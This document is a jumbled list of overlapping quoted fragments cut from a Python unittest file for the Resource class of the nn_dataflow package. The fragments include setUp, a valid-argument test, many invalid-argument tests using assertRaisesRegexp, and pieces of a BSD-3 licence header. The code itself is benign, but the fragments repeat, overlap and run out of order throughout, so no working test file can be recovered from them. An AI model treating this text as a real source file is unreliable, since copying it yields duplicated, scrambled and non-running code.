"with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def",
"A PARTICULAR PURPOSE. See the BSD-3 License for more details. You should have",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"redistribute it and/or modify it under the terms of the Modified BSD-3 License",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'):",
"the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'):",
"NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests",
") def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ =",
"dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2,",
"Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC)",
"dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16,",
"0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def",
"Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2,",
"the Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\"",
"test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self):",
"This program is distributed in the hope that it will be useful, but",
"'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, )",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region,",
"nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource.",
"test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"Initiative. This program is distributed in the hope that it will be useful,",
"type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False,",
"test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): '''",
"type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0,",
"by the Open Source Initiative. This program is distributed in the hope that",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM.",
"= Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _",
"self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. '''",
"dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): '''",
"self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self):",
"Source Initiative. This program is distributed in the hope that it will be",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=None,",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'):",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with",
"2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"of Trustees of Stanford University This program is free software: you can redistribute",
"is free software: you can redistribute it and/or modify it under the terms",
"as published by the Open Source Initiative. This program is distributed in the",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type",
"dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;",
"'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"have received a copy of the Modified BSD-3 License along with this program.",
"WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR",
"'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region =",
"Modified BSD-3 License as published by the Open Source Initiative. This program is",
"free software: you can redistribute it and/or modify it under the terms of",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
") def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource:",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with",
"even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. '''",
"Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'):",
"Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"Trustees of Stanford University This program is free software: you can redistribute it",
"2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf')",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _",
"PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16),",
"arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"= Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def",
"''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"terms of the Modified BSD-3 License as published by the Open Source Initiative.",
"= Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"License as published by the Open Source Initiative. This program is distributed in",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): '''",
"self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region.",
"2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region =",
"''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False,",
"dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self):",
"BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'):",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim,",
"Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"(C) 2016-2019 by The Board of Trustees of Stanford University This program is",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ =",
"16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128,",
"Open Source Initiative. This program is distributed in the hope that it will",
"modify it under the terms of the Modified BSD-3 License as published by",
"FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details. You should",
"import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. '''",
"def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"Stanford University This program is free software: you can redistribute it and/or modify",
") def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ =",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self):",
"can redistribute it and/or modify it under the terms of the Modified BSD-3",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError,",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): '''",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"and/or modify it under the terms of the Modified BSD-3 License as published",
"no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1),",
"for more details. You should have received a copy of the Modified BSD-3",
"'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _",
"resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _",
"it and/or modify it under the terms of the Modified BSD-3 License as",
"<https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from",
"no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _",
"size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError,",
"no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _",
"Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
") def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ =",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False,",
") def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ =",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): '''",
"ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A",
"def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2),",
".*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self):",
"software: you can redistribute it and/or modify it under the terms of the",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=None, )",
"MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more",
"setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2),",
"If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core",
"size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion",
